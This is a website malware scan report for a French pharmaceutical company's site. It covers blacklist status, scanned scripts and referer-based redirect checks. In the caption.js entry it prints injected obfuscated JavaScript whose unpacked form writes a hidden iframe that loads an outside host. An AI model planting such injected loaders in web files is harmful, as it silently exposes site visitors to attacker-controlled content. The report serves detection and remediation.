Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=horus-pharma.fr
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://horus-pharma.fr/
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://horus-pharma.fr/ | 200 OK Content-Length: 13324 Content-Type: text/html | clean |
http://horus-pharma.fr/media/system/js/caption.js | 200 OK Content-Length: 2645 Content-Type: application/x-javascript | malicious |
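Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width" }); <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . -->
Note: the JCaption code at the start of the excerpt appears to be the CMS's regular caption script; the injected part is the packed eval(function(p,a,c,k,e,r){...}) block that follows it. Unpacked with the keyword list shown, it is a single document.write call that inserts an iframe styled display:none whose src is hxxp://g-statistic[.]info/?id=2 (defanged), so every page that includes caption.js silently loads content from that third-party host. Because several scripts on the site carry the same flag, remediation means restoring the files from a known-good copy and finding how they were modified, not just deleting this one block.
Antivirus reports: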
| ||
http://horus-pharma.fr/plugins/content/avreloaded/silverlight.js | 200 OK Content-Length: 8534 Content-Type: application/x-javascript | malicious |
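Malicious code - confirmed by antiviruses (see below) if(!window.Silverlight)window.Silverlight={};Silverlight._silverlightCount=0;Silverlight.ua=null;Silverlight.available=false;Silverlight.fwlinkRoot="http://go.microsoft.com/fwlink/?LinkID=";Silverlight.detectUserAgent=function(){var a=window.navigator.userAgent;Silverlight.ua={OS:"Unsupported",Browser:"Unsupported"};if(a.indexOf("Windows NT")>=0)Silverlight.ua.OS="Windows";else if(a.indexOf("PPC Mac OS X")>=0)Silverlight.ua.OS="MacPPC";else if(a.indexOf("Intel Mac OS X")>=0)Silverlight. <!-- . -->
Note: the excerpt above is the beginning of the regular Silverlight.js loader and is cut off before any injected code is shown; the flagged payload is presumably located further down the file, as in caption.js. The same applies to the wmvplayer.js, swfobject.js and avreloaded.js excerpts below, so the visible library code should not be read as the malicious part.
Antivirus reports: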
| ||
http://horus-pharma.fr/plugins/content/avreloaded/wmvplayer.js | 200 OK Content-Length: 16904 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof jeroenwijering=="undefined"){var jeroenwijering=new Object();jeroenwijering.utils=new Object()}jeroenwijering.Player=function(B,C,A){this.configuration={backgroundcolor:"ffffff",file:"video.wmv",height:"260",image:"",backcolor:"FFFFFF",frontcolor:"000000",lightcolor:"000000",screencolor:"000000",width:"320",logo:"",overstretch:"false",showicons:"true",shownavigation:"true",showstop:"false",showdigits:"true",usefullscreen:"true",usemute:"false",autostart:"false",bufferlength:"3",duratio <!-- . --> Antivirus reports:
| ||
http://horus-pharma.fr/plugins/content/avreloaded/swfobject.js | 200 OK Content-Length: 12695 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var UNDEF="undefined",OBJECT="object",SHOCKWAVE_FLASH="Shockwave Flash",SHOCKWAVE_FLASH_AX="ShockwaveFlash.ShockwaveFlash",FLASH_MIME_TYPE="application/x-shockwave-flash",EXPRESS_INSTALL_ID="SWFObjectExprInst",win=window,doc=document,nav=navigator,domLoadFnArr=[],regObjArr=[],timer=null,storedAltContent=null,storedAltContentId=null,isDomLoaded=false,isExpressInstallActive=false;var ua=function(){var w3cdom=typeof doc.getElementById!=UNDEF&&typeof doc.getEle <!-- . --> Antivirus reports:
| ||
http://horus-pharma.fr/plugins/content/avreloaded/avreloaded.js | 200 OK Content-Length: 2788 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof (allvideos)=="undefined"){var allvideos=new Object();allvideos.APIs=new Array()}function getUpdate(D,C,B,A){if(A=="null"){return }allvideos.APIs.each(function(E){if(E._pid==A){E._plCB(D,C,B)}})}allvideos.API=function(B){var A=null;allvideos.APIs.each(function(C){if(C._pid==B){A=C}});if(A!=null){return A}this._pid=B;this._player=null;this._item=null;this._load=null;this._width=null;this._height=null;this._state=null;this._elapsed=null;this._remaining=null;this._volume=null;this._p <!-- . --> Antivirus reports:
| ||
http://horus-pharma.fr/index.php/fr/la-societe/nos-engagements | 200 OK Content-Length: 14368 Content-Type: text/html | clean |
http://horus-pharma.fr/index.php/fr/la-societe/ | 404 Not Found Content-Length: 1442 Content-Type: text/html | clean |
http://horus-pharma.fr/index.php | 200 OK Content-Length: 13333 Content-Type: text/html | clean |
http://horus-pharma.fr/index.php/fr/la-societe/nos-metiers | 200 OK Content-Length: 28100 Content-Type: text/html | clean |
http://horus-pharma.fr/index.php/fr/la-societe/chiffres-cles | 200 OK Content-Length: 20895 Content-Type: text/html | clean |
http://horus-pharma.fr/index.php/fr/la-societe/historique | 200 OK Content-Length: 18684 Content-Type: text/html | clean |
http://horus-pharma.fr/index.php/fr/produits | 200 OK Content-Length: 13179 Content-Type: text/html | clean |
http://horus-pharma.fr/index.php/fr/ | 200 OK Content-Length: 13337 Content-Type: text/html | clean |
http://horus-pharma.fr/index.php/fr/produits/allergie | 200 OK Content-Length: 11007 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: horus-pharma.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 11 Sep 2014 05:27:38 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 11 Sep 2014 05:27:39 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0cb638d679640774b342e6e1748ab928=r4r0fdk5jcdjvld0m3ue4ft7v7; path=/
Set-Cookie: lang=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: jfcookie=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: jfcookie[lang]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: PHP/5.3.12
Second query (visit from search engine):
GET / HTTP/1.1
Host: horus-pharma.fr
Referer: http://www.google.com/search?q=horus-pharma.fr
Result:
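The result is similar to the first query; no suspicious redirects were found. Note that this check only varies the Referer header: redirects conditioned on other factors (user agent, cookies, visitor IP address, first visit only) would not show up here.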